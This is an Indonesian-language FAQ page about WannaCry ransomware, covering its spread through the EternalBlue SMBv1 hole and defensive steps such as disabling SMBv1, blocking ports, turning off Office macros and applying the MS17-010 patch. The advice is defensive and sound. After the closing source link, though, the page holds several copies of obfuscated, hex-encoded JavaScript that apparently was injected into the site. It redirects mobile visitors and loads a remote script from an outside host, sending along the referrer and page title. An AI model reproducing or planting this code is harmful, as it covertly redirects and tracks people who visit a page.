FAQ WannaCryptor Ransomware

http://www.indotelko.com/images/media/201705/ori/infowanna.jpg

  1. Apakah Wannacryptor Ransomware itu?

Wannacryptor Ransomware adalah jenis varian baru untuk ransomware di kenal juga dengan nama WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY.

Wannacryptor adalah ransomware yang memiliki kapabilitas / kemampuan untuk menyebarkan diri (propagasi) kepada calon korban lainnya menggunakan celah keamanan (Exploit) file sharing windows (SMBv1 Exploit). Dengan demikian Wannacryptor merupakan ransomware yang unik karena memiliki fitur yang mirip dengan worm untuk propagasi.

 

  1. Bagaimana Wannacryptor bekerja?

Seperti lazimnya ransomware lain, Wannacryptor yang sudah menginfeksi computer korbannya, akan melakukan enkripsi terhadap semua dokumen si korban, sehingga korban tidak dapat mengakses semua dokumen yang ada pada laptop / pc nya.

 

  1. Tipe File apa saja yang terkena imbas (enkripsi) oleh Wannacryptor ransomware tersebut?

Berdasarkan hasil penelitian beberapa computer security expert, tipe file berikut ini yang akan terkena imbas (ter encrypt) jika anda terinfeksi Wannacry Ransomware :

.doc, .docx, .xls, .xlsx, .ppt, .pptx, .pst, .ost, .msg, .eml, .vsd, .vsdx, .txt, .csv, .rtf, .123, .wks, .wk1, .pdf, .dwg, .onetoc2, .snt, .jpeg, .jpg, .docb, .docm, .dot, .dotm, .dotx, .xlsm, .xlsb, .xlw, .xlt, .xlm, .xlc, .xltx, .xltm, .pptm, .pot, .pps, .ppsm, .ppsx, .ppam, .potx, .potm, .edb, .hwp, .602, .sxi, .sti, .sldx, .sldm, .sldm, .vdi, .vmdk, .vmx, .gpg, .aes, .ARC, .PAQ, .bz2, .tbk, .bak, .tar, .tgz, .gz, .7z, .rar, .zip, .backup, .iso, .vcd, .bmp, .png, .gif, .raw, .cgm, .tif, .tiff, .nef, .psd, .ai, .svg, .djvu, .m4u, .m3u, .mid, .wma, .flv, .3g2, .mkv, .3gp, .mp4, .mov, .avi, .asf, .mpeg, .vob, .mpg, .wmv, .fla, .swf, .wav, .mp3, .sh, .class, .jar, .java, .rb, .asp, .php, .jsp, .brd, .sch, .dch, .dip, .pl, .vb, .vbs, .ps1, .bat, .cmd, .js, .asm, .h, .pas, .cpp, .c, .cs, .suo, .sln, .ldf, .mdf, .ibd, .myi, .myd, .frm, .odb, .dbf, .db, .mdb, .accdb, .sql, .sqlitedb, .sqlite3, .asc, .lay6, .lay, .mml, .sxm, .otg, .odg, .uop, .std, .sxd, .otp, .odp, .wb2, .slk, .dif, .stc, .sxc, .ots, .ods, .3dm, .max, .3ds, .uot, .stw, .sxw, .ott, .odt, .pem, .p12, .csr, .crt, .key, .pfx, .der

 

  1. Bagaimana Wannacryptor Ransomware menyebar?

Seperti lazimnya beberapa varian ransomware lain, Wannacryptor dapat tersebar melalui cara berikut ini :

  1. Disebarkan melalui malicious document (PDF, Word, etc) yang di attach melalui email address kepada calon korbannya (phishing email)
  2. Korban yang terinfeksi setelah mendownload file yang tidak dikenal dari internet.
  3. Pertukaran media seperti USB Flash Disk atau External Hard Drive yang sudah terkontaminasi ransomware.
  4. Pertukaran data dan dokumen ( File Sharing Document )

Lazimnya Ransomware menyebar melalui metode tersebut. Namun ada yang unik pada Wanncryptor ini, yaitu dia melakukan propagasi (menyebarkan diri), melalui salah satu celah keamanan (exploit) yang belum lama ter-expose ke publik, yaitu celah keamanan pada File Sharing Protocol Microsoft. Celah keamanan tersebut memiliki Code Name EternalBlue. Celah keamanan ini digunakan si pembuat Wannacryptor Ransomware untuk membantu menyebarkan Wanncaryptor ini. Celah keamanan EternalBlue ini memanfaatkan Exploit SMBv1 pada computer berbasis Windows.

  1. Bagaimana langkah pencegahan agar saya tidak terinfeksi Ransomware Wanncryptor?
  1. Jangan pernah sembarangan membuka email attachment dari orang yang tidak anda kenal
  2. Jangan pernah meng-klik Link URL pada email yang dikirimkan oleh orang yang tidak dikenal
  3. Jangan mendownload aplikasi bajakan, karena software bajakan / software crack berpotensi menjadi salah satu penyebab jalan masuknya ransomware.
  4. Perbaharui ( Update ) dan Patch Sistem Operasi (Operating System) Windows anda segera (MS17-010 Vulnerability)
  5. Perbaharui ( Update ) Antivirus Anda segera
  6. Menonaktifkan SMBv1 untuk mencegah penyebaran Ransomware Wannacryptor. Untuk langkah step by step menonaktifkan SMBv1 dapat dilakukan dengan cara sebagai berikut :

Untuk melakukan Menonaktifkan (Disable) SMBv1, ada beberapa cara yang dapat dilakukan, sebagai berikut (Langkah Mitigasi Cukup dilakukan dengan menggunakan salah satu cara berikut) :

  1. Menonaktifkan SMBv1 Menggunakan Powershell

(Windows 7, Windows 8, Windows 10, Windows 2008 Server, Windows 2012 Server)

  1. Untuk menonaktifkan SMBv1 melalui Powershell, langkah pertama adalah dengan mengakses Powershell dari Start menu Windows. Run Powershell As Administrator.
  2. Untuk mengetahui apakah SMBv1 Dalam Posisi Aktif atau NonAktif (Enable atau Disable), dapat mengecek dengan menggunakan perintah berikut ini :

Get-SmbServerConfiguration | Select EnableSMB1Protocol, EnableSMB2Protocol

  1. Lihat Output dari Step Point b tadi, jika hasilnya adalah seperti berikut :

EnableSMB1Protocol EnableSMB2Protocol

ai??i??ai??i??ai??i??ai??i??ai??i??ai??i??ai??i??ai??i??ai??i??- ai??i??ai??i??ai??i??ai??i??ai??i??ai??i??ai??i??ai??i??ai??i??-

TrueTrue

Output di atas menandakan bahwa SMBv1 Protocol dalam kondisi Aktif (Enabled). Maka perlu kita nonaktifkan (Disable)

  1. Untuk menonaktifkan SMBv1 menggunakan perintah berikut ini :
Set-SmbServerConfiguration -EnableSMB1Protocol $false

Jika ada konfirmasi seperti ini, maka silakan Ketik Y :

Confirm

Are you sure you want to perform this action?

Performing operation ai???Modifyai??i?? on Target ai???SMB Server Configurationai??i??.

[Y] Yes[A] Yes to All[N] No[L] No to All[S] Suspend[?] Help (default is ai???Yai???): Y

  1. Menonaktifkan SMBv1 Menggunakan Command Prompt (CMD)

(All Windows Platform)

 

  1. Jalankan Command Prompt (CMD) as Administrator

(Klik Kanan Pada Command Prompt, Pilih Opsi Run As Administrator)

  1. Ketikkan perintah di bawah ini :
sc.exe config lanmanworkstation depend= bowser/mrxsmb20/nsi

Pastikan outputnya adlah sebagai berikut :

[SC] ChangeServiceConfig SUCCESS

  1. Ketikkan perintah di bawah ini :
sc.exe config mrxsmb10 start= disabled

Pastikan outputnya adlah sebagai berikut :

[SC] ChangeServiceConfig SUCCESS

  1. Menonaktifkan SMBv1 Menggunakan Registry Editor (Regedit)

(All Windows Platform)

 

  1. Buka Menu Run dari Windows anda (Keyboard Shortcut : Windows + R)
  2. Ketikkan regedit
  3. Buka Registry Key Berikut ini :

Registry subkey:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters

Rubah Key untuk Parameter SMB1 :

Registry entry: SMB1
REG_DWORD: 0 = Disabled
REG_DWORD: 1 = Enabled
Default: 1 = Enabled

Rubah REG_DWORD value untuk SMB1 menjadi 0

CATATAN :

PC / LAPTOP / SERVER yang sudah di rubah konfigurasi nya, Harus dilakukan RESTART.

  1. Blok port TCP: 139/445 & 3389 dan UDP: 137 & 138, yang digunakan untuk melakukan penyerangan (jika memungkinkan, namun kebanyakan perusahaan menggunakan hal ini, jadi perlu di konsultasikan dengan Tim IT Di masing-masing perusahaan).

Port 139/445 pada sistem Windows digunakan untuk banyak keperluan. Salah satu keperluan yang membutuhkan port tersebut adalah untuk Sharing File / Folder dan Sharing Printer. Port ini digunakan Wannacrypt sebagai media propagasi (penyebaran diri). Jika tidak digunakan, sebaiknya port-port ini ditutup. Jika port ini ditutup, maka ada kemungkinan beberapa layanan yang biasa Anda lakukan (sharing file dan sharing printer) tidak berfungsi.

Untuk Step by step Melakukan Blocking Pada Port tersebut adalah sebagai berikut :

  1. Klik Start
  2. Ketik Windows Firewall
  3. Klik Menu Advanced Setting (Menu ini ada di Pilihan Sebelah Kiri)
  4. Klik Menu Inbound Rule (Menu ini ada di bagian Paling Kiri)
  5. Klik New Rule (Menu ini ada di bagian paling kanan)
  6. Pada Menu Rule Type Pilih Radio Button Port, lalu klik Next
  7. Pada Menu Protocol and Ports Pilih Radio Button TCP, Lalu di bagian bawah pilih Radio Button Specific Local Ports, lalu isikan : 139, 445, 3389 lalu klik Next
  8. Pada Menu Action Pilih Radio Button : Block the connection, lalu klik Next
  9. Pada Menu Profile, Centang Semua PIlihan yang ada (Domain, Private, Public), lalu klik Next
  10. Pada Kolom Name, Isikan Nama Profilenya : ai???Block Wannacryptor TCPai??? Ransomware Propagation.

Pada Kolom Description bisa di isi dengan : ai???Mitigasi untuk propagasi Wannacryptor Ransomware via SMB dan RDP Servicesai???, lalu klik Finish

  1. Pastikan pada Bagian Inbound Rule sekarang ada Nama Profile ai???Block Wanncryptor Ransomwareai??? dengan Status Enabled

Ulangi Step by Step di atas mulai dari nomor i s.d vi

  • Pada nomor vii, pilih Radio Button UDP, dan lalu isikan : 137, 138
  • Lakukan hal yang sama nomor viii sampai dengan nomor ix.
  • Pada nomor x, Isikan Nama Profilenya ai???Block Ransomware Wannacryptor UDPai???.
  1. Menonaktifkan Fungsi Macro Pada Microsoft Office anda. Langkah step by stepnya adalah sebagai berikut :

Untuk Microsoft Office 2007 (Word, Excel, Power Point)

  1. Klik Microsoft Office Button di Kiri Atas. Lalu Pilih Access Options
  2. Klik Trust Center, lalu klik Trus Center Settings, dan lalu klik Macro Settings
  3. Pilih Opsi : Disable all macros with notification

Untuk Microsoft Office 2007 (Outlook)

  1. Pilih Menu Tools, lalu klik Trust Center
  2. Klik Settings
  3. Pilih Opsi : Disable all macros with notification

Untuk Microsoft Office versi berikut :

Excel 2016 Word 2016 Outlook 2016 PowerPoint 2016 Access 2016 Visio Professional 2016 Visio Standard 2016

Excel 2013 Word 2013 Outlook 2013 PowerPoint 2013 Access 2013 Visio 2013 Visio Professional 2013

Excel 2010 Word 2010 PowerPoint 2010 Access 2010 Visio 2010 Office 2010 Visio Premium 2010 Visio Standard 2010

  1. Klik Tab File
  2. Klik Options
  3. Klik Trust Center, lalu klik Trust Center Settings
  4. Pada bagian Trust Center, klik Macro Settings
  5. Pilih Opsi : Disable all macros with notification
  6. Klik OK
  1. Sistem Operasi (Operating System) apa saja yang dapat terkena dampak Wannacry Ransomware ini?

Berdasarkan rilis informasi dari Microsoft, OS berikut ini rentan akan Wannacryptor Ransomware :

  • Windows 10
  • Windows RT 8.1
  • Windows 8.1
  • Windows 7
  • Windows Vista
  • Windows XP
  • Windows Server 2016
  • Windows Server 2012 and Windows Server 2012 R2
  • Windows Server 2008 and Windows Server 2008 R2
  • Windows 2003 Server

Untuk list lengkapnya dapat di lihat pada halaman berikut ini :

https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

  1. Apakah hanya Sistem Operasi (Operating System) berbasis Windows yang dapat terinfeksi?

Tidak. Operating system yang berbasis Linux juga dapat terinfeksi ransomware ini, jika Linux tersebut ter-install WINE (Emulator Aplikasi Windows)

 

  1. Apakah Jika saya sudah meng-update Operating System saya, dan Anti Virus saya, saya masih berpotensi terkena Ransomware ini?

Ya, masih tetap berpotensi. Karena ada kemungkinan Wannacryptor membuat versi varian baru yang tidak bisa (atau belum bisa) terdeteksi signature antivirus, sehingga masih dapat berpotensi menginfeksi komputer anda.

 

  1. Apakah Jika saya sudah meng-update Operating System saya, dan Anti Virus saya, saya boleh membuka port 139, 445, dan 3389?

Secara teknikal, setelah anda melakukan patch pada Sistem Operasi (Operating System) anda, dan sudah melakukan Disable SMBv1 pada pertanyaan sebelumnya, anda aman dari bahaya potensi propagasi Ransomware tersebut melalui SMBv1 Services. Namun anda tetap perlu waspada, karena Ransomware tetap dapat menginfeksi anda melalui media lain seperti email phishing, malicious document (Word, Excel, PDF, etc), USB Flash Disk, Sharing File dan Folder, Serta Software Bajakan.

 

  1. Lalu, jika saya masih berpotensi terkena Wannacryptor, apa langkah Best Practice yang harus saya lakukan?

Secara mudah, untuk mengurangi / meminimalisir peluang dan potensi terkena Wannacryptor dan Ransomware lainnya anda dapat melakukan hal sederhana berikut ini :

  1. Jangan pernah sembarangan membuka email attachment dari orang yang tidak anda kenal
  2. Jangan pernah meng-klik Link URL yang tidak dikenal, terutama pada email yang dikirimkan oleh orang yang tidak dikenal
  3. Jangan mendownload aplikasi bajakan, karena software bajakan / software crack berpotensi menjadi salah satu penyebab jalan masuknya ransomware.
  4. Selalu melakukan Update dan Patch Operating System Windows secara rutin
  5. Selalu melakukan Update Antivirus secara rutin

 

  1. Jika saya sudah terlanjur terkena Wannacryptor Ransomware, langkah apa yang harus saya lakukan?
  1. Sampai saat ini belum ada decryption tools untuk mengembalikan file yang sudah terenkripsi oleh Wannacryptor Ransomware
  2. Putuskan Koneksi Jaringan Internal Network Anda (Untuk Mencegah propagasi / penyebaran Ransomware melalui celah keamanan Exploit SMBv1 kepada computer lain)
  3. Backup semua file yang sudah terenkripsi ke dalam media terpisah (seperti flashdisk atau hardisk), dan media tersebut jangan digunakan sebagai media pertukaran file (hanya untuk menyimpan dokumen anda yang terenkripsi). Tujuannya adalah jika sewaktu-waktu ada decryption toolsnya, anda dapat mengembalikan file yang sudah terenkripsi.
  4. Install Ulang laptop / PC anda dan Restore dokumen anda dari Backup File yang ada.
  1. Mengapa di komputer saya tidak ada SMB nya, atau SMB Services nya tidak aktif?

Jika tidak ada fitur SMB atau SMB Services anda tidak aktif, kemungkinan sudah di konfigurasi by policy oleh system administrator IT pada perusahaan anda. Jadi anda tidak perlu melakukan langkah pada nomor 5F di atas.

 

  1. Bagaimmana cara mengetahui apakah PC saya sudah ter-update Sistem Operasi Windows nya?

Jika anda meginstall update system operasi windows anda secara online, anda dapat melakukan pengecekan pada :

  1. Klik Start Menu
  2. Ketik Windows Update
  3. Klik Update History

Sebagai contoh :

Untuk Windows 10, pastikan terdapat update berikut ini :

Cumulative Update for Windows 10 Version 1607 for x64-based Systems (KB4013429)

Untuk Versi Windows lainnya, pengecekan dan nomor KB untuk update tiap system operasi dapat merujuk pada halaman berikut ini :

https://support.microsoft.com/en-us/help/4013389/title

  1. Bagaimana cara melakukan update pada sistem operasi saya?

 

Terdapat 2 cara untuk melakukan update pada sistem operasi anda :

  1. Online

Anda dapat langsung melakukan update, dengan cara sebagai berikut :

Windows 10

  1. Klik Start Menu
  2. Ketik Windows Update
  3. Klik Tombol Check for Updates

Windows 8, 8.1

  1. Klik Start Menu
  2. Ketik Control Panel
  3. Klik Tombol System and Security
  4. Klik Windows Update
  5. Klik Check for Updates

Windows 7

  1. Klik Start Menu
  2. Klik Control Panel
  3. Klik Windows Update
  4. Klik Check for Updates

 

  1. Offline

Untuk mendownload file installer untuk Patch celah keamanan MS17-010, anda dapat mengunduh (download) secara manual patch tersebut pada halaman berikut ini :

https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Anda dapat mengunduh (download) sesuai dengan system operasi yang anda gunakan. Setelah mengunduh file tersebut, anda dapat meng-copykan installer patch Ms17-010 tersebut ke laptop / pc anda, dan menjalankan update patch tersebut secara offline (tanpa terkoneksi ke internet).

  1. Apakah handphone juga bisa terkena ransomware ini?

Tidak. Sejauh ini hanyak yang terkena adalah sistem operasi berbasis windows.

 

  1. Kapan saya dapat menggunakan internet dan jaringan secara aman?
  1. Jika anda sudah melakukan pembaharuan Sistem Operasi Windows anda dengan update terbaru
  2. Jika anda sudah melakukan pembaharuan (update) antivirus anda dengan signature versi yang paling baru

Namun tetap pastikan, anda harus tetap waspada, sadar dan berhati-hati terhadap hal-hal lain yang dapat membuat anda terkena malware seperti dokumen malicious pada email, USB flash disk, sharing file, dan software bajakan.

 

sumber : https://govcsirt.kominfo.go.id/pencegahan-dini-ransomware-wannacry/var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0xb322=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( 